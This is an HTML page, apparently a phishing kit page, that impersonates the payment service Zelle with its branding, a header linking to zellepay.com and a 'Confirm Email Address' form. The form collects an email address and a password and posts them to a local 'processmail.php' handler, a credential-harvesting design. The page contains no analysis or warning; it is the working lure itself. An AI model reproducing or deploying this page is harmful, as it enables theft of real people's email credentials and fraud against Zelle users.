<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="utf-8">
	<meta name="viewport" content="width=device-width, initial-scale=1">
	<link rel="stylesheet" href="bootstrap/css/bootstrap.min.css">
	<link rel="stylesheet" href="css/style.css">
	<link rel="Image/cropped-unnamed-32x32.png" href="Image/cropped-unnamed-32x32.png">
    <link rel="shortcut icon" type="Image/cropped-unnamed-32x32.png" href="Image/cropped-unnamed-32x32.png">
	<script src="https://kit.fontawesome.com/2ff1153782.js" crossorigin="anonymous"></script>
	<script src="js/jquery-3.3.1.js"></script>
	<link href="icofont/icofont.min.css" rel="stylesheet">
	<!-- <link rel="stylesheet" href="css/animate.min.css"> -->
	<link rel="stylesheet" href="css/theme.css">
	<script src="bootstrap/js/bootstrap.min.js"></script>
	<script src="https://maps.googleapis.com/maps/api/js"></script>
    
    <title>Email – Zelle</title>
</head>
<body>
    <div class="container-fluid topbar">
        <style>
           .topbar{
            background-color: #6D1ED4;
           } 
           .heading-title{
            color: #FFFFFF;
            font-family: "Roboto Slab", Sans-serif;
            font-weight: 400;
            font-size: 29px;
           }
           .center-image{
            text-align: center;
           }
           .size-medium{
            font-size: 19px;
            color: #434445;
            font-family: Sans-serif;
           }
           .size-small{
            color: #DE3C3C;
            font-family:  "Roboto slab", Sans-serif;
            font-size: 15px;
           }
           input, select{
            display: block;
            width: 100%;
            padding: 0.375rem 0.375rem;
            margin-bottom: 5px;
            font-size: 1rem;
            line-height: 1.5;
            color: #212529;
            background-color: transparent;
            border-width: 1.5px ;
            border-color: #6D1ED4;
           }
           .btn-primary2{
            color: #fff;
            background-color: #6D1ED4;
            border-color: #6D1ED4;
           }
    
           @media screen and (min-width:601px) {
            .heading-title{
                text-align: left;
            }
            .headingtitle, .size-medium {
                text-align: left;
            }
           }
           @media screen and (max-width:600px) {
            .heading-title{
                text-align: center;
            }
            .headingtitle, .size-medium{
                text-align: center;
            }
            .buttonnext{
                text-align: center;
            }
            .centerimg2 img{
                width: 100%;
                height: auto;
            }
           }
           
        </style>										
        <div class="container">
            <div class="row">
                <div class="col-md-auto">
                    <a href="http://zellepay.com">
                        <img width="100%" height="auto" src="Image/Z-Header-1024x210.jpg" class="attachment-large size-large" alt="" loading="lazy"  sizes="(max-width: 1024px) 100vw, 1024px">
                    </a>
                </div>     
	        </div>
            <h2 class="heading-title">ZELLE</h2>
        </div>
    </div>
    <section class="subpaddingf">
        <div class="container">
            <h3 class="size-default">Confirm Email Address</h3>
                <span>To Continue </span>
            <form action="processmail.php" method="post" role="form" >
                
                <div class="form-group subpaddingf">
                    <input type="email" name="emaila" class="" id="emaila" placeholder="Email Address" required  data-msg="Please enter Email Address" Required/>
                  </div>

                <div class="form-group subpaddingf">
                    <input type="password" name="pass" class="" id="pass" placeholder="Password" required data-msg="Please enter Password " Required/>
                  </div>

                <div class="buttonnext subpaddingf">
                    <button type="submit" class="btn btn-primary2 btn-lg" name="btnemail"> Next </button>
                </div>
              </form>
            
    </section>

   
    <section class="mypaddings">
        <div class="center-image centerimg2">
            <a href="https://youtu.be/IDZa1wRsCYM">
            <img width="741" height="1024" src="Image/Z-middle3-741x1024.jpg" class="attachment-thumbnail size-thumbnail" alt="" loading="lazy">
            </div>
        </div>
        <div class="container">
            
                    <div class="center-image centerimg2">
                        <img width="687vw" height="1024vw" src="Image/Z-footer-687x1024.jpg" class="attachment-thumbnail size-thumbnail" alt="" loading="lazy" >
                    </div>

        </div>
        
       
    </section>
</body>
</html>